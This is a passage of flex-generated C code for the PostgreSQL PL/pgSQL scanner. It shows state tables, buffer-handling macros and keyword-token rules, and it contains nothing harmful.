80, 80, 80, 76, 38, 308, 80, 309, 38, 76, 80, 314, 305, 76, 74, 79, 79, 79, 38, 315, 38, 79, 306, 38, 0, 79, 0, 0, 38, 308, 80, 309, 38, 72, 72, 314, 90, 72, 90, 83, 83, 83, 90, 315, 72, 83, 0, 79, 72, 83, 82, 82, 82, 362, 80, 0, 82, 0, 72, 72, 82, 90, 72, 90, 274, 274, 274, 90, 72, 84, 274, 79, 72, 78, 78, 78, 84, 125, 362, 78, 84, 84, 82, 78, 125, 85, 85, 85, 125, 0, 78, 85, 78, 0, 84, 85, 78, 281, 281, 281, 84, 0, 125, 281, 84, 84, 82, 86, 125, 0, 89, 86, 125, 89, 86, 78, 0, 78, 89, 86, 316, 78, 0, 87, 87, 87, 318, 326, 0, 87, 0, 0, 86, 87, 89, 86, 363, 89, 86, 88, 88, 88, 89, 86, 316, 88, 91, 91, 91, 88, 318, 326, 91, 92, 92, 92, 91, 87, 333, 92, 93, 363, 93, 92, 0, 0, 93, 95, 95, 95, 0, 88, 334, 95, 96, 96, 96, 95, 0, 336, 96, 87, 333, 92, 96, 93, 127, 93, 97, 97, 97, 93, 0, 127, 97, 88, 334, 127, 97, 99, 99, 99, 95, 336, 96, 99, 0, 92, 94, 99, 98, 127, 98, 0, 338, 94, 98, 127, 97, 94, 94, 127, 94, 282, 282, 282, 95, 340, 96, 282, 100, 100, 100, 94, 345, 98, 100, 98, 338, 94, 100, 98, 97, 94, 94, 0, 94, 101, 101, 101, 367, 340, 349, 101, 102, 0, 102, 101, 345, 100, 102, 111, 111, 111, 111, 0, 0, 111, 113, 113, 113, 111, 0, 0, 113, 367, 349, 101, 113, 102, 0, 102, 351, 100, 0, 102, 115, 115, 115, 115, 120, 120, 120, 120, 122, 122, 122, 123, 123, 123, 122, 101, 0, 123, 122, 353, 351, 123, 124, 126, 124, 133, 123, 133, 124, 0, 126, 133, 0, 128, 126, 126, 128, 129, 361, 0, 129, 128, 0, 353, 0, 129, 0, 124, 126, 124, 133, 123, 133, 124, 126, 0, 133, 128, 126, 126, 128, 129, 361, 0, 129, 128, 130, 130, 130, 129, 0, 0, 130, 131, 131, 131, 130, 0, 0, 131, 0, 130, 0, 131, 0, 132, 132, 132, 0, 0, 135, 132, 135, 0, 131, 132, 135, 134, 134, 134, 0, 0, 136, 134, 136, 0, 130, 134, 136, 0, 137, 137, 137, 0, 132, 135, 137, 135, 0, 131, 137, 135, 138, 0, 138, 0, 0, 136, 138, 136, 139, 139, 139, 136, 0, 0, 139, 0, 132, 0, 139, 0, 137, 0, 140, 140, 140, 138, 0, 138, 140, 0, 0, 138, 140, 141, 141, 141, 0, 142, 144, 141, 142, 144, 0, 141, 137, 142, 144, 0, 140, 143, 0, 143, 0, 0, 0, 143, 0, 145, 145, 145, 0, 142, 144, 145, 142, 144, 0, 145, 0, 142, 144, 0, 140, 0, 143, 0, 143, 146, 146, 146, 143, 0, 147, 146, 147, 0, 0, 146, 147, 148, 148, 148, 149, 0, 149, 148, 0, 150, 149, 148, 150, 151, 0, 152, 0, 150, 146, 147, 151, 147, 152, 0, 151, 147, 152, 0, 0, 149, 0, 149, 148, 150, 0, 149, 150, 0, 151, 0, 152, 150, 146, 0, 151, 0, 152, 153, 151, 0, 152, 154, 154, 154, 153, 0, 148, 154, 153, 0, 155, 154, 156, 155, 0, 156, 154, 0, 155, 0, 156, 157, 153, 157, 0, 0, 0, 157, 153, 0, 159, 0, 153, 159, 155, 0, 156, 155, 159, 156, 0, 154, 155, 0, 156, 0, 157, 0, 157, 158, 158, 158, 157, 0, 159, 158, 161, 159, 160, 158, 160, 0, 159, 161, 160, 163, 0, 161, 162, 0, 162, 0, 163, 164, 162, 0, 163, 0, 0, 0, 164, 161, 0, 160, 164, 160, 0, 161, 158, 160, 163, 161, 0, 162, 165, 162, 163, 165, 164, 162, 163, 0, 165, 0, 164, 0, 0, 0, 164, 170, 170, 170, 170, 172, 172, 172, 0, 0, 165, 172, 0, 165, 0, 172, 0, 0, 165, 176, 176, 176, 176, 0, 0, 176, 177, 177, 177, 176, 181, 182, 177, 178, 178, 178, 177, 181, 182, 178, 0, 181, 182, 178, 180, 180, 180, 180, 183, 0, 183, 0, 0, 190, 183, 181, 182, 184, 184, 184, 190, 181, 182, 184, 190, 181, 182, 184, 185, 0, 185, 0, 0, 183, 185, 183, 0, 186, 190, 183, 186, 187, 187, 187, 190, 186, 0, 187, 190, 184, 0, 187, 0, 185, 0, 185, 0, 0, 0, 185, 0, 186, 187, 0, 186, 188, 188, 188, 0, 186, 0, 188, 0, 184, 189, 188, 0, 189, 0, 0, 188, 0, 189, 191, 191, 191, 192, 187, 192, 191, 0, 0, 192, 191, 0, 0, 193, 0, 189, 0, 0, 189, 0, 193, 0, 188, 189, 193, 194, 194, 194, 192, 195, 192, 194, 195, 0, 192, 
194, 0, 195, 193, 196, 196, 196, 0, 0, 193, 196, 0, 0, 193, 196, 0, 0, 0, 195, 194, 0, 195, 197, 197, 197, 0, 195, 0, 197, 198, 198, 198, 197, 0, 0, 198, 199, 199, 199, 198, 0, 0, 199, 194, 197, 0, 199, 200, 200, 200, 201, 201, 201, 200, 0, 0, 201, 200, 0, 0, 201, 202, 202, 202, 203, 203, 203, 202, 0, 197, 203, 202, 0, 205, 203, 205, 0, 200, 0, 205, 206, 206, 206, 207, 207, 207, 206, 0, 208, 207, 206, 208, 0, 207, 0, 0, 208, 209, 205, 209, 205, 200, 211, 209, 205, 211, 0, 210, 210, 210, 211, 0, 208, 210, 0, 208, 0, 210, 0, 214, 208, 214, 209, 0, 209, 214, 211, 0, 209, 211, 212, 212, 212, 210, 211, 0, 212, 213, 213, 213, 212, 0, 0, 213, 214, 215, 214, 213, 215, 216, 214, 216, 0, 215, 0, 216, 0, 210, 0, 0, 212, 230, 230, 230, 230, 0, 0, 213, 0, 215, 0, 0, 215, 219, 216, 219, 216, 215, 0, 219, 216, 0, 0, 221, 212, 221, 217, 217, 217, 221, 0, 213, 217, 218, 218, 218, 217, 0, 219, 218, 219, 0, 0, 218, 219, 220, 220, 220, 221, 0, 221, 220, 0, 0, 221, 220, 226, 226, 226, 226, 0, 0, 226, 227, 227, 227, 226, 0, 0, 227, 228, 228, 228, 227, 0, 0, 228, 0, 0, 0, 228, 235, 235, 235, 235, 238, 238, 238, 239, 239, 239, 238, 0, 0, 239, 238, 0, 0, 239, 240, 240, 240, 241, 241, 241, 240, 0, 0, 241, 240, 0, 0, 241, 242, 0, 0, 0, 241, 0, 0, 242, 243, 243, 243, 242, 0, 0, 243, 0, 0, 0, 243, 0, 244, 244, 244, 0, 246, 242, 244, 246, 0, 241, 244, 242, 246, 0, 247, 242, 0, 247, 243, 245, 245, 245, 247, 248, 0, 245, 0, 0, 246, 245, 248, 246, 0, 0, 248, 0, 246, 0, 247, 0, 0, 247, 243, 0, 0, 0, 247, 0, 248, 245, 249, 249, 249, 0, 248, 0, 249, 0, 248, 0, 249, 250, 250, 250, 251, 251, 251, 250, 0, 0, 251, 250, 0, 245, 251, 252, 252, 252, 253, 253, 253, 252, 0, 260, 253, 252, 0, 0, 253, 0, 260, 0, 0, 250, 260, 0, 251, 255, 258, 255, 258, 0, 0, 255, 258, 256, 256, 256, 260, 0, 253, 256, 0, 0, 260, 256, 0, 250, 260, 0, 251, 0, 255, 258, 255, 258, 0, 0, 255, 258, 257, 257, 257, 0, 253, 256, 257, 259, 259, 259, 257, 261, 0, 259, 0, 0, 262, 259, 261, 262, 263, 0, 261, 263, 262, 264, 264, 264, 263, 256, 265, 264, 312, 312, 312, 264, 261, 265, 312, 259, 262, 265, 261, 262, 263, 0, 261, 263, 262, 0, 0, 0, 263, 0, 0, 265, 0, 264, 266, 266, 266, 265, 0, 259, 266, 265, 0, 0, 266, 272, 272, 272, 272, 280, 280, 280, 280, 284, 0, 280, 0, 264, 285, 0, 284, 285, 0, 0, 284, 0, 285, 286, 286, 286, 287, 0, 287, 286, 0, 0, 287, 286, 284, 0, 289, 0, 285, 0, 284, 285, 0, 289, 284, 0, 285, 289, 288, 288, 288, 287, 0, 287, 288, 0, 0, 287, 288, 0, 0, 289, 290, 290, 290, 0, 0, 289, 290, 0, 0, 289, 290, 0, 0, 291, 292, 291, 292, 0, 288, 291, 292, 293, 293, 293, 295, 295, 295, 293, 0, 0, 295, 293, 0, 0, 295, 0, 0, 0, 291, 292, 291, 292, 288, 0, 291, 292, 296, 296, 296, 297, 297, 297, 296, 0, 0, 297, 296, 0, 0, 297, 298, 298, 298, 299, 299, 299, 298, 0, 0, 299, 298, 301, 296, 299, 301, 300, 0, 300, 0, 301, 0, 300, 302, 302, 302, 313, 313, 313, 302, 0, 0, 313, 302, 0, 0, 301, 296, 0, 301, 298, 300, 0, 300, 301, 0, 0, 300, 303, 303, 303, 304, 304, 304, 303, 0, 0, 304, 303, 0, 0, 304, 311, 311, 311, 311, 0, 0, 311, 319, 319, 319, 304, 0, 0, 319, 0, 0, 320, 319, 320, 321, 321, 321, 320, 0, 0, 321, 322, 322, 322, 321, 0, 0, 322, 0, 324, 304, 322, 324, 0, 319, 0, 320, 324, 320, 323, 323, 323, 320, 0, 0, 323, 0, 0, 0, 323, 0, 0, 0, 324, 0, 0, 324, 328, 319, 0, 328, 324, 325, 325, 325, 328, 0, 0, 325, 0, 0, 323, 325, 327, 327, 327, 329, 329, 329, 327, 330, 328, 329, 327, 328, 0, 329, 330, 0, 328, 0, 330, 331, 331, 331, 323, 0, 343, 331, 343, 0, 0, 331, 343, 0, 330, 341, 341, 341, 0, 0, 330, 341, 0, 344, 330, 341, 342, 342, 342, 0, 344, 343, 342, 343, 344, 
0, 342, 343, 346, 0, 346, 347, 347, 347, 346, 0, 0, 347, 344, 0, 355, 347, 355, 0, 344, 0, 355, 0, 344, 0, 356, 356, 356, 346, 0, 346, 356, 0, 0, 346, 356, 0, 0, 347, 0, 355, 0, 355, 358, 358, 358, 355, 365, 0, 358, 359, 359, 359, 358, 365, 0, 359, 0, 365, 0, 359, 358, 347, 366, 366, 366, 0, 0, 0, 366, 0, 0, 365, 366, 370, 370, 370, 0, 365, 0, 370, 0, 365, 0, 370, 0, 358, 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, 373, 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, 374, 375, 375, 375, 375, 375, 375, 375, 375, 375, 375, 375, 376, 376, 376, 376, 376, 376, 376, 376, 376, 376, 376, 377, 0, 0, 0, 377, 377, 378, 378, 378, 0, 378, 378, 0, 378, 378, 378, 379, 379, 379, 379, 379, 379, 379, 0, 379, 379, 379, 380, 380, 0, 380, 380, 380, 380, 380, 380, 380, 380, 381, 381, 381, 381, 381, 0, 381, 381, 381, 381, 381, 382, 0, 0, 0, 0, 382, 383, 383, 383, 383, 383, 383, 383, 383, 383, 383, 383, 384, 0, 0, 0, 384, 384, 385, 385, 0, 0, 385, 385, 385, 385, 385, 385, 385, 386, 386, 386, 386, 0, 0, 0, 0, 0, 386, 387, 0, 0, 0, 387, 387, 388, 388, 388, 388, 0, 0, 0, 0, 0, 388, 389, 389, 389, 389, 389, 389, 389, 389, 389, 389, 389, 390, 390, 390, 0, 390, 390, 0, 390, 390, 390, 391, 391, 391, 391, 391, 391, 391, 391, 391, 391, 391, 392, 392, 392, 0, 392, 392, 0, 392, 392, 392, 393, 393, 393, 393, 0, 0, 0, 0, 0, 393, 394, 394, 394, 394, 0, 0, 0, 0, 0, 394, 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, 395, 396, 396, 396, 0, 396, 396, 0, 0, 396, 396, 397, 397, 397, 397, 397, 397, 397, 397, 397, 397, 397, 398, 398, 398, 0, 398, 398, 0, 0, 398, 398, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372, 372 } ; static yy_state_type yy_last_accepting_state; static char *yy_last_accepting_cpos; extern int plpgsql_base_yy_flex_debug; int plpgsql_base_yy_flex_debug = 0; /* The intent behind this definition is that it'll catch * any uses of REJECT which flex missed. 
*/ #define REJECT reject_used_but_not_detected #define yymore() yymore_used_but_not_detected #define YY_MORE_ADJ 0 #define YY_RESTORE_YY_MORE_OFFSET char *plpgsql_base_yytext; #line 1 "scan.l" #line 2 "scan.l" /*------------------------------------------------------------------------- * * scan.l - Scanner for the PL/pgSQL * procedural language * * Portions Copyright (c) 1996-2008, PostgreSQL Global Development Group * Portions Copyright (c) 1994, Regents of the University of California * * * IDENTIFICATION * $PostgreSQL: pgsql/src/pl/plpgsql/src/scan.l,v 1.60 2008/01/01 19:46:00 momjian Exp $ * *------------------------------------------------------------------------- */ #include "plpgsql.h" #include "mb/pg_wchar.h" /* No reason to constrain amount of data slurped */ #define YY_READ_BUF_SIZE 16777216 /* Avoid exit() on fatal scanner errors (a bit ugly -- see yy_fatal_error) */ #undef fprintf #define fprintf(file, fmt, msg) ereport(ERROR, (errmsg_internal("%s", msg))) /* Handles to the buffer that the lexer uses internally */ static YY_BUFFER_STATE scanbufhandle; static char *scanbuf; static const char *scanstr; /* original input string */ static int scanner_functype; static bool scanner_typereported; static int pushback_token; static bool have_pushback_token; static const char *cur_line_start; static int cur_line_num; static char *dolqstart; /* current $foo$ quote start string */ static int dolqlen; /* signal to plpgsql_get_string_value */ bool plpgsql_SpaceScanned = false; /* $foo$ style quotes ("dollar quoting") * copied straight from the backend SQL parser */ #line 1196 "pl_scan.c" #define INITIAL 0 #define IN_STRING 1 #define IN_COMMENT 2 #define IN_DOLLARQUOTE 3 #ifndef YY_NO_UNISTD_H /* Special case for "unistd.h", since it is non-ANSI. We include it way * down here because we want the user's section 1 to have been scanned first. * The user has a chance to override it with an option. */ #include <unistd.h> #endif #ifndef YY_EXTRA_TYPE #define YY_EXTRA_TYPE void * #endif static int yy_init_globals (void ); /* Accessor methods to globals. These are made visible to non-reentrant scanners for convenience. */ int plpgsql_base_yylex_destroy (void ); int plpgsql_base_yyget_debug (void ); void plpgsql_base_yyset_debug (int debug_flag ); YY_EXTRA_TYPE plpgsql_base_yyget_extra (void ); void plpgsql_base_yyset_extra (YY_EXTRA_TYPE user_defined ); FILE *plpgsql_base_yyget_in (void ); void plpgsql_base_yyset_in (FILE * in_str ); FILE *plpgsql_base_yyget_out (void ); void plpgsql_base_yyset_out (FILE * out_str ); int plpgsql_base_yyget_leng (void ); char *plpgsql_base_yyget_text (void ); int plpgsql_base_yyget_lineno (void ); void plpgsql_base_yyset_lineno (int line_number ); /* Macros after this point can all be overridden by user definitions in * section 1. */ #ifndef YY_SKIP_YYWRAP #ifdef __cplusplus extern "C" int plpgsql_base_yywrap (void ); #else extern int plpgsql_base_yywrap (void ); #endif #endif #ifndef yytext_ptr static void yy_flex_strncpy (char *,yyconst char *,int ); #endif #ifdef YY_NEED_STRLEN static int yy_flex_strlen (yyconst char * ); #endif #ifndef YY_NO_INPUT #ifdef __cplusplus static int yyinput (void ); #else static int input (void ); #endif #endif /* Amount of stuff to slurp up with each read. */ #ifndef YY_READ_BUF_SIZE #define YY_READ_BUF_SIZE 8192 #endif /* Copy whatever the last rule matched to the standard output. */ #ifndef ECHO /* This used to be an fputs(), but since the string might contain NUL's, * we now use fwrite(). 
*/ #define ECHO fwrite( plpgsql_base_yytext, plpgsql_base_yyleng, 1, plpgsql_base_yyout ) #endif /* Gets input and stuffs it into "buf". number of characters read, or YY_NULL, * is returned in "result". */ #ifndef YY_INPUT #define YY_INPUT(buf,result,max_size) \ if ( YY_CURRENT_BUFFER_LVALUE->yy_is_interactive ) \ { \ int c = '*'; \ int n; \ for ( n = 0; n < max_size && \ (c = getc( plpgsql_base_yyin )) != EOF && c != '\n'; ++n ) \ buf[n] = (char) c; \ if ( c == '\n' ) \ buf[n++] = (char) c; \ if ( c == EOF && ferror( plpgsql_base_yyin ) ) \ YY_FATAL_ERROR( "input in flex scanner failed" ); \ result = n; \ } \ else \ { \ errno=0; \ while ( (result = fread(buf, 1, max_size, plpgsql_base_yyin))==0 && ferror(plpgsql_base_yyin)) \ { \ if( errno != EINTR) \ { \ YY_FATAL_ERROR( "input in flex scanner failed" ); \ break; \ } \ errno=0; \ clearerr(plpgsql_base_yyin); \ } \ }\ \ #endif /* No semi-colon after return; correct usage is to write "yyterminate();" - * we don't want an extra ';' after the "return" because that will cause * some compilers to complain about unreachable statements. */ #ifndef yyterminate #define yyterminate() return YY_NULL #endif /* Number of entries by which start-condition stack grows. */ #ifndef YY_START_STACK_INCR #define YY_START_STACK_INCR 25 #endif /* Report a fatal error. */ #ifndef YY_FATAL_ERROR #define YY_FATAL_ERROR(msg) yy_fatal_error( msg ) #endif /* end tables serialization structures and prototypes */ /* Default declaration of generated scanner - a define so the user can * easily add parameters. */ #ifndef YY_DECL #define YY_DECL_IS_OURS 1 extern int plpgsql_base_yylex (void); #define YY_DECL int plpgsql_base_yylex (void) #endif /* !YY_DECL */ /* Code executed at the beginning of each rule, after plpgsql_base_yytext and plpgsql_base_yyleng * have been set up. */ #ifndef YY_USER_ACTION #define YY_USER_ACTION #endif /* Code executed at the end of each rule. */ #ifndef YY_BREAK #define YY_BREAK break; #endif #define YY_RULE_SETUP \ if ( plpgsql_base_yyleng > 0 ) \ YY_CURRENT_BUFFER_LVALUE->yy_at_bol = \ (plpgsql_base_yytext[plpgsql_base_yyleng - 1] == '\n'); \ YY_USER_ACTION /** The main scanner function which does all the work. */ YY_DECL { register yy_state_type yy_current_state; register char *yy_cp, *yy_bp; register int yy_act; #line 81 "scan.l" /* ---------- * Local variables in scanner to remember where * a string or comment started * ---------- */ int start_lineno = 0; char *start_charpos = NULL; /* ---------- * Reset the state when entering the scanner * ---------- */ BEGIN(INITIAL); plpgsql_SpaceScanned = false; /* ---------- * On the first call to a new source report the * function's type (T_FUNCTION or T_TRIGGER) * ---------- */ if (!scanner_typereported) { scanner_typereported = true; return scanner_functype; } /* ---------- * The keyword rules * ---------- */ #line 1414 "pl_scan.c" if ( !(yy_init) ) { (yy_init) = 1; #ifdef YY_USER_INIT YY_USER_INIT; #endif if ( ! (yy_start) ) (yy_start) = 1; /* first start state */ if ( ! plpgsql_base_yyin ) plpgsql_base_yyin = stdin; if ( ! plpgsql_base_yyout ) plpgsql_base_yyout = stdout; if ( ! YY_CURRENT_BUFFER ) { plpgsql_base_yyensure_buffer_stack (); YY_CURRENT_BUFFER_LVALUE = plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); } plpgsql_base_yy_load_buffer_state( ); } while ( 1 ) /* loops until end-of-file is reached */ { yy_cp = (yy_c_buf_p); /* Support of plpgsql_base_yytext. */ *yy_cp = (yy_hold_char); /* yy_bp points to the position in yy_ch_buf of the start of * the current run. 
*/ yy_bp = yy_cp; yy_current_state = (yy_start); yy_current_state += YY_AT_BOL(); yy_match: do { register YY_CHAR yy_c = yy_ec[YY_SC_TO_UI(*yy_cp)]; if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++yy_cp; } while ( yy_current_state != 372 ); yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); yy_find_action: yy_act = yy_accept[yy_current_state]; YY_DO_BEFORE_ACTION; do_action: /* This label is used only to access EOF actions. */ switch ( yy_act ) { /* beginning of action switch */ case 0: /* must back up */ /* undo the effects of YY_DO_BEFORE_ACTION */ *yy_cp = (yy_hold_char); yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); goto yy_find_action; case 1: YY_RULE_SETUP #line 112 "scan.l" { return K_ASSIGN; } YY_BREAK case 2: YY_RULE_SETUP #line 113 "scan.l" { return K_ASSIGN; } YY_BREAK case 3: YY_RULE_SETUP #line 114 "scan.l" { return K_DOTDOT; } YY_BREAK case 4: YY_RULE_SETUP #line 115 "scan.l" { return K_ALIAS; } YY_BREAK case 5: YY_RULE_SETUP #line 116 "scan.l" { return K_BEGIN; } YY_BREAK case 6: YY_RULE_SETUP #line 117 "scan.l" { return K_BY; } YY_BREAK case 7: YY_RULE_SETUP #line 118 "scan.l" { return K_CLOSE; } YY_BREAK case 8: YY_RULE_SETUP #line 119 "scan.l" { return K_CONSTANT; } YY_BREAK case 9: YY_RULE_SETUP #line 120 "scan.l" { return K_CONTINUE; } YY_BREAK case 10: YY_RULE_SETUP #line 121 "scan.l" { return K_CURSOR; } YY_BREAK case 11: YY_RULE_SETUP #line 122 "scan.l" { return K_DEBUG; } YY_BREAK case 12: YY_RULE_SETUP #line 123 "scan.l" { return K_DECLARE; } YY_BREAK case 13: YY_RULE_SETUP #line 124 "scan.l" { return K_DEFAULT; } YY_BREAK case 14: YY_RULE_SETUP #line 125 "scan.l" { return K_DIAGNOSTICS; } YY_BREAK case 15: YY_RULE_SETUP #line 126 "scan.l" { return K_ELSE; } YY_BREAK case 16: YY_RULE_SETUP #line 127 "scan.l" { return K_ELSIF; } YY_BREAK case 17: YY_RULE_SETUP #line 128 "scan.l" { return K_ELSIF; } YY_BREAK case 18: YY_RULE_SETUP #line 129 "scan.l" { return K_END; } YY_BREAK case 19: YY_RULE_SETUP #line 130 "scan.l" { return K_EXCEPTION; } YY_BREAK case 20: YY_RULE_SETUP #line 131 "scan.l" { return K_EXECUTE; } YY_BREAK case 21: YY_RULE_SETUP #line 132 "scan.l" { return K_EXIT; } YY_BREAK case 22: YY_RULE_SETUP #line 133 "scan.l" { return K_FETCH; } YY_BREAK case 23: YY_RULE_SETUP #line 134 "scan.l" { return K_FOR; } YY_BREAK case 24: YY_RULE_SETUP #line 135 "scan.l" { return K_FROM; } YY_BREAK case 25: YY_RULE_SETUP #line 136 "scan.l" { return K_GET; } YY_BREAK case 26: YY_RULE_SETUP #line 137 "scan.l" { return K_IF; } YY_BREAK case 27: YY_RULE_SETUP #line 138 "scan.l" { return K_IN; } YY_BREAK case 28: YY_RULE_SETUP #line 139 "scan.l" { return K_INFO; } YY_BREAK case 29: YY_RULE_SETUP #line 140 "scan.l" { return K_INSERT; } YY_BREAK case 30: YY_RULE_SETUP #line 141 "scan.l" { return K_INTO; } YY_BREAK case 31: YY_RULE_SETUP #line 142 "scan.l" { return K_IS; } YY_BREAK case 32: YY_RULE_SETUP #line 143 "scan.l" { return K_LOG; } YY_BREAK case 33: YY_RULE_SETUP #line 144 "scan.l" { return K_LOOP; } YY_BREAK case 34: YY_RULE_SETUP #line 145 "scan.l" { return K_MOVE; } YY_BREAK case 35: /* rule 35 can match eol */ YY_RULE_SETUP #line 146 "scan.l" { return K_NOSCROLL; } 
YY_BREAK case 36: YY_RULE_SETUP #line 147 "scan.l" { return K_NOT; } YY_BREAK case 37: YY_RULE_SETUP #line 148 "scan.l" { return K_NOTICE; } YY_BREAK case 38: YY_RULE_SETUP #line 149 "scan.l" { return K_NULL; } YY_BREAK case 39: YY_RULE_SETUP #line 150 "scan.l" { return K_OPEN; } YY_BREAK case 40: YY_RULE_SETUP #line 151 "scan.l" { return K_OR; } YY_BREAK case 41: YY_RULE_SETUP #line 152 "scan.l" { return K_PERFORM; } YY_BREAK case 42: YY_RULE_SETUP #line 153 "scan.l" { return K_RAISE; } YY_BREAK case 43: YY_RULE_SETUP #line 154 "scan.l" { return K_RENAME; } YY_BREAK case 44: YY_RULE_SETUP #line 155 "scan.l" { return K_RESULT_OID; } YY_BREAK case 45: YY_RULE_SETUP #line 156 "scan.l" { return K_RETURN; } YY_BREAK case 46: YY_RULE_SETUP #line 157 "scan.l" { return K_REVERSE; } YY_BREAK case 47: YY_RULE_SETUP #line 158 "scan.l" { return K_ROW_COUNT; } YY_BREAK case 48: YY_RULE_SETUP #line 159 "scan.l" { return K_SCROLL; } YY_BREAK case 49: YY_RULE_SETUP #line 160 "scan.l" { return K_STRICT; } YY_BREAK case 50: YY_RULE_SETUP #line 161 "scan.l" { return K_THEN; } YY_BREAK case 51: YY_RULE_SETUP #line 162 "scan.l" { return K_TO; } YY_BREAK case 52: YY_RULE_SETUP #line 163 "scan.l" { return K_TYPE; } YY_BREAK case 53: YY_RULE_SETUP #line 164 "scan.l" { return K_WARNING; } YY_BREAK case 54: YY_RULE_SETUP #line 165 "scan.l" { return K_WHEN; } YY_BREAK case 55: YY_RULE_SETUP #line 166 "scan.l" { return K_WHILE; } YY_BREAK case 56: YY_RULE_SETUP #line 168 "scan.l" { return O_OPTION; } YY_BREAK case 57: YY_RULE_SETUP #line 169 "scan.l" { return O_DUMP; } YY_BREAK /* ---------- * Special word rules * * We set plpgsql_error_lineno in each rule so that errors reported * in the pl_comp.c subroutines will point to the right place. * ---------- */ case 58: /* rule 58 can match eol */ YY_RULE_SETUP #line 179 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_word(plpgsql_base_yytext); } YY_BREAK case 59: /* rule 59 can match eol */ YY_RULE_SETUP #line 182 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblword(plpgsql_base_yytext); } YY_BREAK case 60: /* rule 60 can match eol */ YY_RULE_SETUP #line 185 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripword(plpgsql_base_yytext); } YY_BREAK case 61: /* rule 61 can match eol */ YY_RULE_SETUP #line 188 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordtype(plpgsql_base_yytext); } YY_BREAK case 62: /* rule 62 can match eol */ YY_RULE_SETUP #line 191 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordtype(plpgsql_base_yytext); } YY_BREAK case 63: /* rule 63 can match eol */ YY_RULE_SETUP #line 194 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripwordtype(plpgsql_base_yytext); } YY_BREAK case 64: /* rule 64 can match eol */ YY_RULE_SETUP #line 197 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordrowtype(plpgsql_base_yytext); } YY_BREAK case 65: /* rule 65 can match eol */ YY_RULE_SETUP #line 200 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordrowtype(plpgsql_base_yytext); } YY_BREAK case 66: YY_RULE_SETUP #line 203 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_word(plpgsql_base_yytext); } YY_BREAK case 67: /* rule 67 can match eol */ YY_RULE_SETUP #line 206 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return 
plpgsql_parse_dblword(plpgsql_base_yytext); } YY_BREAK case 68: /* rule 68 can match eol */ YY_RULE_SETUP #line 209 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripword(plpgsql_base_yytext); } YY_BREAK case 69: /* rule 69 can match eol */ YY_RULE_SETUP #line 212 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordtype(plpgsql_base_yytext); } YY_BREAK case 70: /* rule 70 can match eol */ YY_RULE_SETUP #line 215 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordtype(plpgsql_base_yytext); } YY_BREAK case 71: /* rule 71 can match eol */ YY_RULE_SETUP #line 218 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_tripwordtype(plpgsql_base_yytext); } YY_BREAK case 72: /* rule 72 can match eol */ YY_RULE_SETUP #line 221 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_wordrowtype(plpgsql_base_yytext); } YY_BREAK case 73: /* rule 73 can match eol */ YY_RULE_SETUP #line 224 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); return plpgsql_parse_dblwordrowtype(plpgsql_base_yytext); } YY_BREAK case 74: YY_RULE_SETUP #line 228 "scan.l" { return T_NUMBER; } YY_BREAK case 75: YY_RULE_SETUP #line 230 "scan.l" { plpgsql_error_lineno = plpgsql_scanner_lineno(); ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated quoted identifier"))); } YY_BREAK /* ---------- * Ignore whitespaces but remember this happened * ---------- */ case 76: /* rule 76 can match eol */ YY_RULE_SETUP #line 241 "scan.l" { plpgsql_SpaceScanned = true; } YY_BREAK /* ---------- * Eat up comments * ---------- */ case 77: YY_RULE_SETUP #line 247 "scan.l" ; YY_BREAK case 78: YY_RULE_SETUP #line 249 "scan.l" { start_lineno = plpgsql_scanner_lineno(); BEGIN(IN_COMMENT); } YY_BREAK case 79: YY_RULE_SETUP #line 252 "scan.l" { BEGIN(INITIAL); plpgsql_SpaceScanned = true; } YY_BREAK case 80: /* rule 80 can match eol */ YY_RULE_SETUP #line 253 "scan.l" ; YY_BREAK case 81: YY_RULE_SETUP #line 254 "scan.l" ; YY_BREAK case YY_STATE_EOF(IN_COMMENT): #line 255 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated comment"))); } YY_BREAK /* ---------- * Collect anything inside of ''s and return one STRING token * * Hacking plpgsql_base_yytext/plpgsql_base_yyleng here lets us avoid using yymore(), which is * a win for performance. It's safe because we know the underlying * input buffer is not changing. 
